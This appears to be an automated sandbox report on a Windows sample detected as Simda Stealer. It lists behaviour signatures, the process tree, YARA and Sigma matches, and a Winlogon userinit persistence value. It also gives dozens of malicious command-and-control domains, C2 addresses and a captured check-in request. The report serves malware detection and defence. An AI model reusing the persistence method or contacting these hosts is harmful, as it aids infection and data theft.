Windows Analysis Report
WlCVLbzNph.exe

Overview

General Information

Sample name: WlCVLbzNph.exe
renamed because original name is a hash value
Original sample name: 2caf9f151b88a328475181b2ecce22f90694795f.exe
Analysis ID: 1553823
MD5: bb4d08026f4dad460862be3d65fbeddb
SHA1: 2caf9f151b88a328475181b2ecce22f90694795f
SHA256: 7ef95304b8e240cba2fddbc90e13d5e8fead7dd65c6c2cddc0e11af14198703b
Tags: exe, user-NDA0E

Detection

Simda Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • WlCVLbzNph.exe (PID: 6788 cmdline: "C:\Users\user\Desktop\WlCVLbzNph.exe" MD5: BB4D08026F4DAD460862BE3D65FBEDDB)
    • svchost.exe (PID: 1736 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 7F7F85F214F3A6B27A5B5FF8F6EC6188)
      • nPtwtzGyOdAtB.exe (PID: 5584 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 3804 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 2940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 716 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 1364 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 2232 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7988 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 6644 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 4864 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 7160 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 2688 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 1992 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 2800 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 7128 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 6304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 6048 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 1504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 712 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 5636 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source: 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
Source: 0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmp; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x48bf4:$a1: name=%s&port=%u
  • 0x483c8:$a2: data_inject
  • 0x4857c:$a3: keylog.txt
  • 0x4825d:$a4: User-agent: %s]]]
  • 0x48d44:$a5: %s\%02d.bmp
Source: 00000002.00000003.1991774796.000000000F280000.00000004.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
Source: 00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmp; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp
Source: 00000002.00000003.1985170745.000000000F280000.00000004.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
Source: 2.3.svchost.exe.886000.4.raw.unpack; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x477f4:$a1: name=%s&port=%u
  • 0x46fc8:$a2: data_inject
  • 0x4717c:$a3: keylog.txt
  • 0x46e5d:$a4: User-agent: %s]]]
  • 0x47944:$a5: %s\%02d.bmp
Source: 2.3.svchost.exe.f280000.32.raw.unpack; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
Source: 2.3.svchost.exe.f280000.35.unpack; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.unpack; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
Source: 2.3.svchost.exe.2d30000.19.unpack; Rule: Windows_Trojan_Zeus_e51c60d7; Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.; Author: unknown; Strings:
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\WlCVLbzNph.exe, ProcessId: 6788, TargetFilename: C:\Windows\apppatch\svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WlCVLbzNph.exe", ParentImage: C:\Users\user\Desktop\WlCVLbzNph.exe, ParentProcessId: 6788, ParentProcessName: WlCVLbzNph.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1736, ProcessName: svchost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 1736, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WlCVLbzNph.exe", ParentImage: C:\Users\user\Desktop\WlCVLbzNph.exe, ParentProcessId: 6788, ParentProcessName: WlCVLbzNph.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1736, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WlCVLbzNph.exe", ParentImage: C:\Users\user\Desktop\WlCVLbzNph.exe, ParentProcessId: 6788, ParentProcessName: WlCVLbzNph.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1736, ProcessName: svchost.exe

AV Detection

Source: WlCVLbzNph.exe; Avira: detected
Source: http://lymywaj.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyfyj.com/login.phpAvira URL Cloud: Label: malware
Source: http://qekyqop.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyquk.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywoq.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyjif.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzyxip.com/login.phpAvira URL Cloud: Label: malware
Source: http://qegyval.com/http://purytyg.com/http://purytyg.com/http://qegyval.com/http://vocyjic.com/http:Avira URL Cloud: Label: malware
Source: http://gacynuz.com/login.phpAvira URL Cloud: Label: malware
Source: http://gahyvuh.com/login.phpAvira URL Cloud: Label: malware
Source: http://pumyxiv.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyryled.com/Avira URL Cloud: Label: malware
Source: http://lymysan.com/login.phpAvira URL Cloud: Label: phishing
Source: http://puzyduq.com/login.phpAvira URL Cloud: Label: malware
Source: http://volycem.com/login.phpAvira URL Cloud: Label: malware
Source: http://galyqaz.com/login.phpAvira URL Cloud: Label: malware
Source: http://lyxysad.com/login.phpAvira URL Cloud: Label: malware
Source: http://gacyzuz.com/login.phpAvira URL Cloud: Label: phishing
Source: http://gahyzez.com/login.phpAvira URL Cloud: Label: malware
Source: http://lykyjad.com/login.phpAvira URL Cloud: Label: malware
Source: http://purywyl.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojycec.com/login.phpAvira URL Cloud: Label: malware
Source: http://volyzic.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojydam.com/login.phpAvira URL Cloud: Label: malware
Source: http://pufybyv.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatyfus.com/login.phpAvira URL Cloud: Label: malware
Source: http://puzylyp.com/Avira URL Cloud: Label: malware
Source: http://lyvyjox.com/login.phpAvira URL Cloud: Label: malware
Source: http://lysyxux.com/Avira URL Cloud: Label: malware
Source: http://lyrytun.com/login.phpAvira URL Cloud: Label: phishing
Source: WlCVLbzNph.exe ReversingLabs: Detection: 84%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.7% probability
Source: WlCVLbzNph.exe Joe Sandbox ML: detected

Compliance

Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Unpacked PE file: 5.2.nPtwtzGyOdAtB.exe.1410000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Unpacked PE file: 6.2.nPtwtzGyOdAtB.exe.1380000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Unpacked PE file: 10.2.nPtwtzGyOdAtB.exe.3210000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Unpacked PE file: 13.2.nPtwtzGyOdAtB.exe.3160000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Unpacked PE file: 20.2.nPtwtzGyOdAtB.exe.1400000.2.unpack
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Unpacked PE file: 32.2.nPtwtzGyOdAtB.exe.2840000.2.unpack
Source: C:\Users\user\Desktop\WlCVLbzNph.exe Unpacked PE file: 0.2.WlCVLbzNph.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exe Unpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: WlCVLbzNph.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2700878019.0000000007C3B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562718584.000000000CC4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPtwtzGyOdAtB.exe, 00000005.00000002.1934683866.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000006.00000002.1935101220.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000A.00000000.1817445370.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000D.00000002.1935586278.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000000F.00000000.1852775945.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1881079746.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000016.00000000.1879737054.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000019.00000000.1898777983.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001C.00000002.1914742299.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 0000001E.00000002.2019539381.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000020.00000002.2050100961.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000023.00000002.2052551913.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989138523.0000000000EEE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000003.2567509191.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC1E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.2693529547.000000000324A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000003.2667325772.000000000CC44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2697326955.0000000003EE8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2708926812.000000000CD8E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02C97CE0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,2_2_02C9BE40
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02C9C3DB

Networking

Source: Network traffic Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49716 -> 23.253.46.64:80
Source: Network traffic Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.8:53944
Source: C:\Windows\apppatch\svchost.exe, Network Connect: 106.15.232.163 8000
Source: C:\Windows\apppatch\svchost.exe, Domain query: vopyret.com
Source: C:\Windows\apppatch\svchost.exe, HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: unknown, DNS traffic detected: English language letter frequency does not match the domain names
Source: unknown, DNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
